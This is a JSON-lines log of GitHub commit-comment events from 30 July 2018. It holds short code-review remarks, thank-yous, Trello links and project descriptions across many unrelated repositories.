{"id":"8035837279","type":"CommitCommentEvent","actor":{"login":"bbatsov"},"repo":{"name":"thheller/shadow-cljs"},"payload":{"comment":{"id":29880468,"position":14,"line":13,"path":"src/main/shadow/cljs/devtools/server/fake_piggieback.clj","commit_id":"fa546ee477e73ed7e04694d85649a5206ca64917","created_at":"2018-07-30T06:57:54Z","updated_at":"2018-07-30T06:57:54Z","author_association":"NONE","body":"I don't think you can rely on `find-ns` here - I think it works only for namespaces that were loaded or something like this. Probably it'd be more reliable to require one ns and and require the alternative if that fails. Not an expert on the subject, though, just remember I was recently bitten by `find-ns` in the past when I was trying to figure out dynamically the capabilities of the environment. "}},"created_at":"2018-07-30T06:57:54Z"}
{"id":"8035840375","type":"CommitCommentEvent","actor":{"login":"kangtom"},"repo":{"name":"kangtom/fabric"},"payload":{"comment":{"id":29880475,"position":null,"line":null,"path":null,"commit_id":"4234843eb232110294526b2cc4e16f1b02b61ebb","created_at":"2018-07-30T06:58:37Z","updated_at":"2018-07-30T06:58:37Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [比特币和数字货币技术](https://trello.com/c/YbeVmo0Q/4-%E6%AF%94%E7%89%B9%E5%B8%81%E5%92%8C%E6%95%B0%E5%AD%97%E8%B4%A7%E5%B8%81%E6%8A%80%E6%9C%AF)"}},"created_at":"2018-07-30T06:58:37Z"}
{"id":"8035841139","type":"CommitCommentEvent","actor":{"login":"Mooophy"},"repo":{"name":"Mooophy/160211"},"payload":{"comment":{"id":29880478,"position":null,"line":null,"path":null,"commit_id":"5a69ec0002226e92ba5c8ed6884a2029a9763675","created_at":"2018-07-30T06:58:49Z","updated_at":"2018-07-30T06:58:49Z","author_association":"OWNER","body":"```matlab\r\n%Problem 4\r\n\r\nC =\r\n\r\n       1             -2              0              1             -3       \r\n       1             -2              1              0             -2       \r\n      -1              2             -3              2              0       \r\n\r\n>> rref(C)\r\n\r\nans =\r\n\r\n       1             -2              0              1             -3       \r\n       0              0              1             -1              1       \r\n       0              0              0              0              0   \r\n\r\n>> rank(C)\r\n\r\nans =\r\n\r\n       2       \r\n\r\n```"}},"created_at":"2018-07-30T06:58:49Z"}
{"id":"8035843079","type":"CommitCommentEvent","actor":{"login":"cgutman"},"repo":{"name":"moonlight-stream/moonlight-stream.github.io"},"payload":{"comment":{"id":29880479,"position":null,"line":null,"path":null,"commit_id":"80e622510188a0d8791f764328893cdde845d0c4","created_at":"2018-07-30T06:59:21Z","updated_at":"2018-07-30T06:59:21Z","author_association":"MEMBER","body":"It's used for the AppStream manifest that will be shown in GNOME Software and other software \"stores\".\r\n\r\nhttps://github.com/moonlight-stream/moonlight-qt/blob/master/app/deploy/linux/com.moonlight_stream.Moonlight.appdata.xml"}},"created_at":"2018-07-30T06:59:21Z"}
{"id":"8035843774","type":"CommitCommentEvent","actor":{"login":"crackhamster"},"repo":{"name":"crackhamster/Propaedeutikum2018"},"payload":{"comment":{"id":29880480,"position":null,"line":null,"path":null,"commit_id":"382feb06bac7c1ba35ebc7bce7bdda96abc79043","created_at":"2018-07-30T06:59:31Z","updated_at":"2018-07-30T06:59:31Z","author_association":"OWNER","body":"there was first a wrong txt. file uploaded"}},"created_at":"2018-07-30T06:59:31Z"}
{"id":"8035850705","type":"CommitCommentEvent","actor":{"login":"Jorys-Paulin"},"repo":{"name":"moonlight-stream/moonlight-stream.github.io"},"payload":{"comment":{"id":29880505,"position":null,"line":null,"path":null,"commit_id":"80e622510188a0d8791f764328893cdde845d0c4","created_at":"2018-07-30T07:01:08Z","updated_at":"2018-07-30T07:01:08Z","author_association":"CONTRIBUTOR","body":"Oh ok, it's just static images hosting"}},"created_at":"2018-07-30T07:01:08Z"}
{"id":"8035853139","type":"CommitCommentEvent","actor":{"login":"ksdme"},"repo":{"name":"ksdme/coala"},"payload":{"comment":{"id":29880518,"position":13,"line":164,"path":"coalib/coala_main.py","commit_id":"8a149234c6dbec611e5885f4b6b1861e2356c51e","created_at":"2018-07-30T07:01:45Z","updated_at":"2018-07-30T07:01:45Z","author_association":"OWNER","body":"Yes, this is just a prototype implementation."}},"created_at":"2018-07-30T07:01:45Z"}
{"id":"8035853454","type":"CommitCommentEvent","actor":{"login":"pplutap"},"repo":{"name":"mazureq/Pawel-Mazurkiewicz-Kodilla-java"},"payload":{"comment":{"id":29880519,"position":3,"line":3,"path":"kodilla-patterns/src/main/java/com/kodilla/patterns/singleton/Logger.java","commit_id":"0ab0747ce1af038f1c12b402e16e8363cec71897","created_at":"2018-07-30T07:01:50Z","updated_at":"2018-07-30T07:01:50Z","author_association":"NONE","body":"Brakuje prywatnego konstruktora"}},"created_at":"2018-07-30T07:01:50Z"}
{"id":"8035861436","type":"CommitCommentEvent","actor":{"login":"mrluoqiuyu"},"repo":{"name":"michaelliao/learngit"},"payload":{"comment":{"id":29880530,"position":null,"line":null,"path":null,"commit_id":"426cb7e06c6cc2fc7160aed93f807b56d994b262","created_at":"2018-07-30T07:03:33Z","updated_at":"2018-07-30T07:03:33Z","author_association":"NONE","body":"fh"}},"created_at":"2018-07-30T07:03:33Z"}
{"id":"8035872664","type":"CommitCommentEvent","actor":{"login":"CuteSSu"},"repo":{"name":"ProjectInTheClass/EnglishBook"},"payload":{"comment":{"id":29880555,"position":null,"line":null,"path":null,"commit_id":"8793dfccf2f397a8ba991ce2621524587c1a1644","created_at":"2018-07-30T07:06:10Z","updated_at":"2018-07-30T07:06:10Z","author_association":"CONTRIBUTOR","body":"영어 원서 리뷰 작성 어플\r\nADS \r\n영어 원서를 읽고 자세하게 리뷰를 작성할 수 있는 어플리케이션 \r\n\r\n4가지 탭으로 구성되어있다. \r\n1. 홈 탭\r\n- 추천책과 베스트 리뷰를 첫화면에 볼 수 있다. \r\n- 검색기능을 통해서 영어 원서를 검색할 수 있다. \r\n- 리뷰를 클릭하면 해당 리뷰와 그 리뷰에 달린 댓글들을 볼 수 있다. \r\n2. 글쓰기 탭\r\n- 자신이 읽은 책에 리뷰를 작성 할 수 있다. \r\n- 임시저장함을 통해서 여러번 글을 수정할 수 있다. \r\n- 제시되는 질문들을 통하여 더욱 깊은 리뷰를 작성할 수 있다. \r\n3. 커뮤니티 탭\r\n- 영어 원서에 대하여 사용자들이 자유롭게 질문과 토론을 할 수 있다. \r\n4. 마이페이지 탭\r\n- 내가 담음 책, 리뷰를 한 번에 볼 수 있다. \r\n- 내가 작성한 리뷰와 댓글을 한 번에 볼 수 있다. \r\n- 팔로워, 팔로우 기능을 제공한다. \r\n"}},"created_at":"2018-07-30T07:06:10Z"}
{"id":"8035875818","type":"CommitCommentEvent","actor":{"login":"SnarkieDesign"},"repo":{"name":"Karmabunny/sprout3"},"payload":{"comment":{"id":29880569,"position":null,"line":null,"path":null,"commit_id":"cc7d36ee5aadc77486f92060c31ef7ec006de1a4","created_at":"2018-07-30T07:06:57Z","updated_at":"2018-07-30T07:06:57Z","author_association":"NONE","body":"yeah noice css @aitken85 "}},"created_at":"2018-07-30T07:06:57Z"}
{"id":"8035876049","type":"CommitCommentEvent","actor":{"login":"cgutman"},"repo":{"name":"moonlight-stream/moonlight-stream.github.io"},"payload":{"comment":{"id":29880570,"position":null,"line":null,"path":null,"commit_id":"80e622510188a0d8791f764328893cdde845d0c4","created_at":"2018-07-30T07:07:00Z","updated_at":"2018-07-30T07:07:00Z","author_association":"MEMBER","body":"Yeah, I wanted to put it in a separate folder so someone wouldn't later forget and delete them because they weren't used in the site."}},"created_at":"2018-07-30T07:07:00Z"}
{"id":"8035877410","type":"CommitCommentEvent","actor":{"login":"MMMohit"},"repo":{"name":"MMMohit/CheckConfigue"},"payload":{"comment":{"id":29880576,"position":null,"line":null,"path":null,"commit_id":"7e19505f00ccbad44c05aee619e749812a3faa3e","created_at":"2018-07-30T07:07:22Z","updated_at":"2018-07-30T07:07:22Z","author_association":"OWNER","body":"Hello This is Simple Check Controller"}},"created_at":"2018-07-30T07:07:22Z"}
{"id":"8035883722","type":"CommitCommentEvent","actor":{"login":"lgirdwood"},"repo":{"name":"singalsu/sof"},"payload":{"comment":{"id":29880591,"position":11,"line":340,"path":"src/audio/dai.c","commit_id":"eaad34b07012734178fa3c0b8923b216bc7f5d5b","created_at":"2018-07-30T07:09:00Z","updated_at":"2018-07-30T07:09:00Z","author_association":"NONE","body":"This would be better if we had a callback in the DAI drivers (ssp, dmic etc) where we could update the config at runtime to align any DAI specific settings. i.e. dai_runtime_params(dai, config);"}},"created_at":"2018-07-30T07:09:00Z"}
{"id":"8035888857","type":"CommitCommentEvent","actor":{"login":"mikitama55"},"repo":{"name":"yuki-tachibana/app_study"},"payload":{"comment":{"id":29880594,"position":null,"line":null,"path":null,"commit_id":"4481b85002cdac1602b04e6ac41b1afc71ce7c9d","created_at":"2018-07-30T07:10:19Z","updated_at":"2018-07-30T07:10:19Z","author_association":"COLLABORATOR","body":"とじゃなくてをね。"}},"created_at":"2018-07-30T07:10:19Z"}
{"id":"8035895086","type":"CommitCommentEvent","actor":{"login":"383384205"},"repo":{"name":"383384205/gitspringcloudtest"},"payload":{"comment":{"id":29880600,"position":2,"line":2,"path":"abcService-dev.properties","commit_id":"f3bc71ca1adefec6de71df25121f8c68fc9baa42","created_at":"2018-07-30T07:11:55Z","updated_at":"2018-07-30T07:11:55Z","author_association":"OWNER","body":"age=19"}},"created_at":"2018-07-30T07:11:55Z"}
{"id":"8035898313","type":"CommitCommentEvent","actor":{"login":"manuel-uberti"},"repo":{"name":"clojure-emacs/cider"},"payload":{"comment":{"id":29880611,"position":null,"line":null,"path":null,"commit_id":"7d3c3c8620dcae86c708279e4cb844891bf11cd0","created_at":"2018-07-30T07:12:43Z","updated_at":"2018-07-30T07:12:43Z","author_association":"CONTRIBUTOR","body":"Probably worth reflecting the change in README.md as well :)"}},"created_at":"2018-07-30T07:12:43Z"}
{"id":"8035905260","type":"CommitCommentEvent","actor":{"login":"Ankine"},"repo":{"name":"SergiyKozachok/DentistProjectRepos"},"payload":{"comment":{"id":29880628,"position":5,"line":30,"path":"src/app/home-for-dentist/home-for-dentist.component.html","commit_id":"d39cdfcf5eaac9ca89e45512d1db5dbf0070a5d3","created_at":"2018-07-30T07:14:30Z","updated_at":"2018-07-30T07:14:30Z","author_association":"NONE","body":"'users' is not correct method name"}},"created_at":"2018-07-30T07:14:30Z"}
{"id":"8035908712","type":"CommitCommentEvent","actor":{"login":"Ankine"},"repo":{"name":"SergiyKozachok/DentistProjectRepos"},"payload":{"comment":{"id":29880639,"position":9,"line":9,"path":"src/app/log-up-form/log-up-form.component.html","commit_id":"d39cdfcf5eaac9ca89e45512d1db5dbf0070a5d3","created_at":"2018-07-30T07:15:21Z","updated_at":"2018-07-30T07:15:21Z","author_association":"NONE","body":"don't use short names (name=\"e\")"}},"created_at":"2018-07-30T07:15:21Z"}
{"id":"8035908953","type":"CommitCommentEvent","actor":{"login":"fmarslan"},"repo":{"name":"fmarslan/scada-community"},"payload":{"comment":{"id":29880640,"position":null,"line":null,"path":null,"commit_id":"d73108a14e22c0ea7059b3c34ab124d529b39e51","created_at":"2018-07-30T07:15:24Z","updated_at":"2018-07-30T07:15:24Z","author_association":"OWNER","body":"how to use :\r\n\r\nStep 1 : ElementGroup type selected Holding Registers\r\nStep 2 : ElementType selected bool\r\nStep 3 : We will write bitoffset value to Bit Offset Input Text"}},"created_at":"2018-07-30T07:15:24Z"}
{"id":"8035917931","type":"CommitCommentEvent","actor":{"login":"AmyBSOD"},"repo":{"name":"demogorgon22/notdnethack"},"payload":{"comment":{"id":29880660,"position":null,"line":null,"path":null,"commit_id":"e1e4bfb4eafd4db634a9fd57d3fe5ea269a7d00c","created_at":"2018-07-30T07:17:36Z","updated_at":"2018-07-30T07:17:36Z","author_association":"NONE","body":"Yay, no more outta depth lich :)"}},"created_at":"2018-07-30T07:17:36Z"}
{"id":"8035919026","type":"CommitCommentEvent","actor":{"login":"Jorys-Paulin"},"repo":{"name":"moonlight-stream/moonlight-stream.github.io"},"payload":{"comment":{"id":29880663,"position":null,"line":null,"path":null,"commit_id":"80e622510188a0d8791f764328893cdde845d0c4","created_at":"2018-07-30T07:17:52Z","updated_at":"2018-07-30T07:17:52Z","author_association":"CONTRIBUTOR","body":"Someone like me would have done it. Might want to add a README.md about that"}},"created_at":"2018-07-30T07:17:52Z"}
{"id":"8035921146","type":"CommitCommentEvent","actor":{"login":"Ankine"},"repo":{"name":"SergiyKozachok/DentistProjectRepos"},"payload":{"comment":{"id":29880673,"position":12,"line":12,"path":"src/app/guards/guard-for-admin.guard.ts","commit_id":"fb0adf3e5a0217572142fb74b06f49fc889a190b","created_at":"2018-07-30T07:18:25Z","updated_at":"2018-07-30T07:18:25Z","author_association":"NONE","body":"Logic to check that current user is 'Admin' should be here"}},"created_at":"2018-07-30T07:18:25Z"}
{"id":"8035923775","type":"CommitCommentEvent","actor":{"login":"Ankine"},"repo":{"name":"SergiyKozachok/DentistProjectRepos"},"payload":{"comment":{"id":29880683,"position":15,"line":15,"path":"src/app/guards/guard-for-patient.guard.ts","commit_id":"fb0adf3e5a0217572142fb74b06f49fc889a190b","created_at":"2018-07-30T07:19:05Z","updated_at":"2018-07-30T07:19:05Z","author_association":"NONE","body":"not only logged in!!!"}},"created_at":"2018-07-30T07:19:05Z"}
{"id":"8035923849","type":"CommitCommentEvent","actor":{"login":"thheller"},"repo":{"name":"thheller/shadow-cljs"},"payload":{"comment":{"id":29880684,"position":14,"line":13,"path":"src/main/shadow/cljs/devtools/server/fake_piggieback.clj","commit_id":"fa546ee477e73ed7e04694d85649a5206ca64917","created_at":"2018-07-30T07:19:06Z","updated_at":"2018-07-30T07:19:06Z","author_association":"OWNER","body":"That was the idea.\r\n\r\nIt should only work when the namespace is loaded. The require is only to establish the local alias in this case. If its not loaded the require actually loads the newer variant. When the `shadow-cljs` standalone version launches it won't have the older nrepl version loaded so the new path is taken.\r\n\r\nThis of course assumes that things like `lein repl` will first load the `nrepl` namespaces before loading user code but this is the behavior I observed."}},"created_at":"2018-07-30T07:19:06Z"}
{"id":"8035924591","type":"CommitCommentEvent","actor":{"login":"snicolet"},"repo":{"name":"mrobaczyk/Stockfish"},"payload":{"comment":{"id":29880686,"position":null,"line":null,"path":null,"commit_id":"e6ef153938cbb6c6a1a127fe5c58065d03c719fb","created_at":"2018-07-30T07:19:17Z","updated_at":"2018-07-30T07:19:17Z","author_association":"NONE","body":"Indeed the bounds of http://tests.stockfishchess.org/tests/view/5b5eb3a00ebc5902bdb91f4a are incorrect, they should be [0..5] :-)\r\n\r\nPlease use the [0..4] bounds only for parameter tweaks, in the sense described in https://github.com/glinscott/fishtest/wiki/Creating-my-first-test"}},"created_at":"2018-07-30T07:19:17Z"}
{"id":"8035924867","type":"CommitCommentEvent","actor":{"login":"Galarzaa90"},"repo":{"name":"Galarzaa90/NabBot"},"payload":{"comment":{"id":29880687,"position":null,"line":null,"path":null,"commit_id":"b0b184aa38096ea91d955ced62e09a8f1fc95d92","created_at":"2018-07-30T07:19:22Z","updated_at":"2018-07-30T07:19:22Z","author_association":"OWNER","body":"@Nezune 🍝 "}},"created_at":"2018-07-30T07:19:22Z"}
{"id":"8035928024","type":"CommitCommentEvent","actor":{"login":"Ankine"},"repo":{"name":"SergiyKozachok/DentistProjectRepos"},"payload":{"comment":{"id":29880700,"position":42,"line":56,"path":"src/app/log-up-form/log-up-form.component.ts","commit_id":"fb0adf3e5a0217572142fb74b06f49fc889a190b","created_at":"2018-07-30T07:20:09Z","updated_at":"2018-07-30T07:20:09Z","author_association":"NONE","body":"it should be a part of separate service"}},"created_at":"2018-07-30T07:20:09Z"}
{"id":"8035932184","type":"CommitCommentEvent","actor":{"login":"RonKaptein"},"repo":{"name":"RonKaptein/git-bootcamp"},"payload":{"comment":{"id":29880714,"position":null,"line":null,"path":null,"commit_id":"149aa05bb0f3014d9a05f10541d6f2fadacd7b0b","created_at":"2018-07-30T07:21:10Z","updated_at":"2018-07-30T07:21:10Z","author_association":"OWNER","body":"test"}},"created_at":"2018-07-30T07:21:10Z"}
{"id":"8035932307","type":"CommitCommentEvent","actor":{"login":"kangtom"},"repo":{"name":"kangtom/fabric"},"payload":{"comment":{"id":29880715,"position":null,"line":null,"path":null,"commit_id":"4234843eb232110294526b2cc4e16f1b02b61ebb","created_at":"2018-07-30T07:21:12Z","updated_at":"2018-07-30T07:21:12Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Mastering Ethereum](https://trello.com/c/j1kKygmn/8-mastering-ethereum)"}},"created_at":"2018-07-30T07:21:12Z"}
{"id":"8035932517","type":"CommitCommentEvent","actor":{"login":"kangtom"},"repo":{"name":"kangtom/fabric"},"payload":{"comment":{"id":29880718,"position":null,"line":null,"path":null,"commit_id":"0bc3781ef9481bf096ba31d63512458c69361091","created_at":"2018-07-30T07:21:15Z","updated_at":"2018-07-30T07:21:15Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Mastering Ethereum](https://trello.com/c/j1kKygmn/8-mastering-ethereum)"}},"created_at":"2018-07-30T07:21:15Z"}
{"id":"8035933026","type":"CommitCommentEvent","actor":{"login":"kangtom"},"repo":{"name":"kangtom/fabric"},"payload":{"comment":{"id":29880719,"position":null,"line":null,"path":null,"commit_id":"5dbbcfdb44b74de83ff6fdb5e8ad1565fe2fdbeb","created_at":"2018-07-30T07:21:23Z","updated_at":"2018-07-30T07:21:23Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Mastering Ethereum](https://trello.com/c/j1kKygmn/8-mastering-ethereum)"}},"created_at":"2018-07-30T07:21:23Z"}
{"id":"8035935301","type":"CommitCommentEvent","actor":{"login":"afck"},"repo":{"name":"poanetwork/hbbft"},"payload":{"comment":{"id":29880725,"position":267,"line":315,"path":"src/agreement/mod.rs","commit_id":"b3bf9e6f2ef279422fe41bc774c7593ddf3f5d32","created_at":"2018-07-30T07:21:57Z","updated_at":"2018-07-30T07:21:57Z","author_association":"CONTRIBUTOR","body":"Actually, I gave the `Term` message `self.epoch + 1`, so it should be"}},"created_at":"2018-07-30T07:21:57Z"}
{"id":"8035939432","type":"CommitCommentEvent","actor":{"login":"MemduhG"},"repo":{"name":"apertium/apertium-uig-tur"},"payload":{"comment":{"id":29880734,"position":85,"line":6078,"path":"apertium-uig-tur.uig-tur.dix","commit_id":"1564d6d171841848723b05308061fad28647444a","created_at":"2018-07-30T07:22:59Z","updated_at":"2018-07-30T07:22:59Z","author_association":"COLLABORATOR","body":"looks like another N2 _demiryol_ type case"}},"created_at":"2018-07-30T07:22:59Z"}
{"id":"8035971798","type":"CommitCommentEvent","actor":{"login":"nkalmar"},"repo":{"name":"apache/zookeeper"},"payload":{"comment":{"id":29880817,"position":null,"line":null,"path":null,"commit_id":"a2623a625a4778720f7d5482d0a66e9b37ae556f","created_at":"2018-07-30T07:30:38Z","updated_at":"2018-07-30T07:30:38Z","author_association":"CONTRIBUTOR","body":"@maoling It has been intentionally removed from 3.6 and 3.5, as I was told the 4 letter words is deprecated, and it will be removed. No new metrics should be introduced."}},"created_at":"2018-07-30T07:30:38Z"}
{"id":"8035972203","type":"CommitCommentEvent","actor":{"login":"marcoabreu"},"repo":{"name":"apache/incubator-mxnet"},"payload":{"comment":{"id":29880820,"position":null,"line":null,"path":null,"commit_id":"4cd4ae85e327d2bbe852aa1f7e8798593e58fcff","created_at":"2018-07-30T07:30:44Z","updated_at":"2018-07-30T07:30:44Z","author_association":"CONTRIBUTOR","body":"What is cudnn and mkldnn are both used?"}},"created_at":"2018-07-30T07:30:44Z"}
{"id":"8035972834","type":"CommitCommentEvent","actor":{"login":"majekolaitan"},"repo":{"name":"majekolaitan/Robotfriends"},"payload":{"comment":{"id":29880822,"position":null,"line":null,"path":null,"commit_id":"58a7bc650e59d4c1db70d0f897d7e77f1e7173bc","created_at":"2018-07-30T07:30:52Z","updated_at":"2018-07-30T07:30:52Z","author_association":"OWNER","body":"Line 10 - tell me what state what piece state and I need to listen to and send us props\r\n- Receives a state\r\n- Return an object:- searchField is gonna equal state which we receives - (dot) the part of the reducer (searchRobots) *** will be added later since we only have one reducer right now *** - (dot) searchField\r\n\r\nThe searchField that we gonna return, which is gonna be use as props by the App component, is going to come from the state.searchRobots.searchField, which comes from our reducer"}},"created_at":"2018-07-30T07:30:52Z"}
{"id":"8035974929","type":"CommitCommentEvent","actor":{"login":"majekolaitan"},"repo":{"name":"majekolaitan/Robotfriends"},"payload":{"comment":{"id":29880825,"position":null,"line":null,"path":null,"commit_id":"58a7bc650e59d4c1db70d0f897d7e77f1e7173bc","created_at":"2018-07-30T07:31:20Z","updated_at":"2018-07-30T07:31:20Z","author_association":"OWNER","body":"Line 16 - tell me what prop's I should listen to that are actions that need to get dispatched.\r\n- Receives a dispatch\r\n- use the dispatch to send an action\r\n- onSearchChange: a prop that its gonna receive\r\n- onSearchChange gonna receive an event\r\n- the event is gonna dispatch the action setSearchField\r\n- the setSearchField is gonna listen to an event (since in our action is gonna receive a text)\r\n\r\nDispatch is what triggers the action so an action is just an object that we've created"}},"created_at":"2018-07-30T07:31:20Z"}
{"id":"8035976277","type":"CommitCommentEvent","actor":{"login":"majekolaitan"},"repo":{"name":"majekolaitan/Robotfriends"},"payload":{"comment":{"id":29880832,"position":null,"line":null,"path":null,"commit_id":"58a7bc650e59d4c1db70d0f897d7e77f1e7173bc","created_at":"2018-07-30T07:31:36Z","updated_at":"2018-07-30T07:31:36Z","author_association":"OWNER","body":"Line 13 - Remove - since redux can replace your state in your app\r\n\r\nLine 24-27 - Remove - because now, it's coming down as props.\r\n\r\nLine 29 - Remove - because now, it's coming down as props.\r\n\r\nLine 38 - Remove - because now, it's coming down as props.\r\n\r\nLine 38 - Added - because now, it's coming down as props."}},"created_at":"2018-07-30T07:31:36Z"}
{"id":"8035982421","type":"CommitCommentEvent","actor":{"login":"Mycatisanalien"},"repo":{"name":"Homebrew/homebrew-cask"},"payload":{"comment":{"id":29880842,"position":null,"line":null,"path":null,"commit_id":"e017fd4dc461198f0275aff069fef3493ba04f63","created_at":"2018-07-30T07:32:54Z","updated_at":"2018-07-30T07:32:54Z","author_association":"NONE","body":"Thanks <3"}},"created_at":"2018-07-30T07:32:54Z"}
{"id":"8035985019","type":"CommitCommentEvent","actor":{"login":"koevskinikola"},"repo":{"name":"camunda/camunda-bpm-platform"},"payload":{"comment":{"id":29880845,"position":97,"line":1001,"path":"engine/src/test/java/org/camunda/bpm/engine/test/history/HistoricProcessInstanceTest.java","commit_id":"7b0c2d767b24b3d5a4bb2ab3d95899a83b5fd071","created_at":"2018-07-30T07:33:30Z","updated_at":"2018-07-30T07:33:30Z","author_association":"CONTRIBUTOR","body":":+1: I'll remove them with the next commit related to this feature."}},"created_at":"2018-07-30T07:33:30Z"}
{"id":"8035986524","type":"CommitCommentEvent","actor":{"login":"HariomKesh"},"repo":{"name":"icherniukh/NFC-Class-Extension-Driver"},"payload":{"comment":{"id":29880848,"position":49,"line":728,"path":"libs/NfcCoreLib/lib/Nci/phNciNfc_NfceeMgmt.c","commit_id":"53c48226cec102b7d2371eeacf9f98b764b052bd","created_at":"2018-07-30T07:33:50Z","updated_at":"2018-07-30T07:33:50Z","author_association":"NONE","body":"In case of  NFCEE_INITIALIZATION_SEQUENCE, phNciNfc_SetUpperLayerCallback set in phLibNfc_NfceeModeSet is overwritten before phNciNfc_NfceeModeSetNtfHandler.\r\nSo, phNciNfc_Notify would fail with Invalid input parameter.\r\n"}},"created_at":"2018-07-30T07:33:50Z"}
{"id":"8035995305","type":"CommitCommentEvent","actor":{"login":"bbatsov"},"repo":{"name":"thheller/shadow-cljs"},"payload":{"comment":{"id":29880860,"position":14,"line":13,"path":"src/main/shadow/cljs/devtools/server/fake_piggieback.clj","commit_id":"fa546ee477e73ed7e04694d85649a5206ca64917","created_at":"2018-07-30T07:35:49Z","updated_at":"2018-07-30T07:35:49Z","author_association":"NONE","body":"Ah, I didn't think of that! Yes, for `lein repl` and `boot repl` this will certainly work, and I guess those are the only cases where we can end up with a legacy nREPL these days. Good idea!"}},"created_at":"2018-07-30T07:35:49Z"}
{"id":"8036002444","type":"CommitCommentEvent","actor":{"login":"bbatsov"},"repo":{"name":"clojure-emacs/cider"},"payload":{"comment":{"id":29880890,"position":null,"line":null,"path":null,"commit_id":"7d3c3c8620dcae86c708279e4cb844891bf11cd0","created_at":"2018-07-30T07:37:21Z","updated_at":"2018-07-30T07:37:21Z","author_association":"MEMBER","body":"I forgot we had this info duplicated. :-)"}},"created_at":"2018-07-30T07:37:21Z"}
{"id":"8036011432","type":"CommitCommentEvent","actor":{"login":"BearishSun"},"repo":{"name":"GameFoundry/bsf"},"payload":{"comment":{"id":29880927,"position":76,"line":122,"path":"Source/Foundation/bsfUtility/Reflection/BsRTTIPlainField.h","commit_id":"f1e7091b28c40e65e904692e29860f013a103a4f","created_at":"2018-07-30T07:39:25Z","updated_at":"2018-07-30T07:39:25Z","author_association":"CONTRIBUTOR","body":"Yep, thanks. I'll modify all the related init functions."}},"created_at":"2018-07-30T07:39:25Z"}
{"id":"8036019187","type":"CommitCommentEvent","actor":{"login":"argowang"},"repo":{"name":"argowang/CodeOfDuty"},"payload":{"comment":{"id":29880952,"position":28,"line":28,"path":"20180727/Palindromic Substring.py","commit_id":"1624e782b1540481a1beccaa0d8b597db687b152","created_at":"2018-07-30T07:41:11Z","updated_at":"2018-07-30T07:41:11Z","author_association":"OWNER","body":"Please use more meaningful variable names."}},"created_at":"2018-07-30T07:41:11Z"}
{"id":"8036021601","type":"CommitCommentEvent","actor":{"login":"Hideyuki-Yamashita"},"repo":{"name":"ntt-ns/spp"},"payload":{"comment":{"id":29880955,"position":null,"line":null,"path":null,"commit_id":"7fa9c334ec434b18c834f02a88a5e7215116841f","created_at":"2018-07-30T07:41:38Z","updated_at":"2018-07-30T07:41:38Z","author_association":"CONTRIBUTOR","body":"ご指摘の点を修正しました。ご確認よろしくお願いします。"}},"created_at":"2018-07-30T07:41:38Z"}
{"id":"8036023613","type":"CommitCommentEvent","actor":{"login":"jims10d"},"repo":{"name":"jims10d/sportman-loopback"},"payload":{"comment":{"id":29880965,"position":null,"line":null,"path":null,"commit_id":"909e58dbb410b297a5594157b154bd87f467d96a","created_at":"2018-07-30T07:42:01Z","updated_at":"2018-07-30T07:42:01Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/5a7e57bc-5410-437d-95a5-d427815f5ebc?env_id=ibm%3Ayp%3Aus-south \"sportman-loopback\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/db4be768-68e6-447f-9187-7d1ee9f620cc?env_id=ibm%3Ayp%3Aus-south \"sportman-loopback\") deployed [sportman-loopback](https://github.com/jims10d/sportman-loopback/releases/tag/deploy-ibm-yp-us-south-jims10d-simpleSpace-20180730-074201 \"deploy-ibm-yp-us-south-jims10d-simpleSpace-20180730-074201\") to [simpleSpace](https://console.bluemix.net/apps/12384bdb-7ac1-45d2-b63b-7d0a3532c568?env_id=ibm:yp:us-south \"ibm:yp:us-south:jims10d:simpleSpace\"), including this commit"}},"created_at":"2018-07-30T07:42:01Z"}
{"id":"8036023912","type":"CommitCommentEvent","actor":{"login":"arfoll"},"repo":{"name":"intel-iot-devkit/mraa"},"payload":{"comment":{"id":29880966,"position":15,"line":82,"path":"CMakeLists.txt","commit_id":"d24457f9a15f5ad4470d55bc69fbece22ce97bfc","created_at":"2018-07-30T07:42:05Z","updated_at":"2018-07-30T07:42:05Z","author_association":"COLLABORATOR","body":"This is a bit nasty, cmake 3.1 provides:\r\nset (CMAKE_CXX_STANDARD 11)\r\nand cmake 3.8 provides:\r\ntarget_compile_features(target PUBLIC cxx_std_11)\r\n\r\n3.8 might be a little too new to use that feature, but i see no real downside in compiling all C++ stuff with C++11? Updating the minimum to cmake 3.1 isn't really too bad, the reason i kept it to 2.8 all these years was to keep compat with old YP 1.6.x builds from 'you know who' :D."}},"created_at":"2018-07-30T07:42:05Z"}
{"id":"8036031770","type":"CommitCommentEvent","actor":{"login":"hoangthan"},"repo":{"name":"mosh-hamedani/vidly-mvc-5"},"payload":{"comment":{"id":29880987,"position":19,"line":19,"path":"Vidly/Controllers/CustomersController.cs","commit_id":"b727a26e1b4b88abe84a8b48208fec537db2ed43","created_at":"2018-07-30T07:43:49Z","updated_at":"2018-07-30T07:43:49Z","author_association":"NONE","body":"thank you very much, bro. Cheers!!!"}},"created_at":"2018-07-30T07:43:49Z"}
{"id":"8036032230","type":"CommitCommentEvent","actor":{"login":"ghost0day"},"repo":{"name":"ghost0day/gitinfo"},"payload":{"comment":{"id":29880990,"position":null,"line":null,"path":null,"commit_id":"21ed0fa2c3338b433b4edb83117ceb615e4bd6da","created_at":"2018-07-30T07:43:56Z","updated_at":"2018-07-30T07:43:56Z","author_association":"OWNER","body":"git hack good tools"}},"created_at":"2018-07-30T07:43:56Z"}
{"id":"8036032349","type":"CommitCommentEvent","actor":{"login":"lhsteward"},"repo":{"name":"lhsteward/GenerateSSM"},"payload":{"comment":{"id":29880992,"position":null,"line":null,"path":null,"commit_id":"ec7514c0768372c1b430df97d9bd2f9f2bf504b1","created_at":"2018-07-30T07:43:58Z","updated_at":"2018-07-30T07:43:58Z","author_association":"OWNER","body":"通过配置文件config.properties,连接需要生成CURD代码的数据库,也可以直接生成SSM配置文件,复制直接使用"}},"created_at":"2018-07-30T07:43:58Z"}
